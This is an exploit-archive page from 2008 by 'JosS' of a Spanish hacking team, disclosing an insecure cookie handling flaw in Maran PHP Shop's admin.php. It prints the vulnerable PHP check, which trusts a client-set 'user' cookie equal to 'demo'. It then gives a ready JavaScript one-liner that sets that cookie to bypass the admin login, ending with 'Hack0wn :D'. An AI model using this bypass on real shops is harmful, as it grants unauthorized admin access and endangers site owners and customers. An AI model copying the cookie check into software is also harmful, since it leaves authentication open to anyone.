[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
# Published : 2008-11-02
# Author : JosS
# Previous Title : Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
# Next Title : Joovili 3.1.4 Insecure Cookie Handling Vulnerability
# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
# url: http://www.maran.pamil-visions.com/maranshop.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
vuln file: /admin.php
vuln code:
<?
$readcookie = $_COOKIE['user'];
if($readcookie!="demo"){echo "error 467. bad login! <a href='login.php'>login here</a>";exit;}
//echo $_COOKIE['user'];
?>
exploit:
javascript:document.cookie = "user=demo; path=/";
Hack0wn :D
# www.Syue.com [2008-11-02]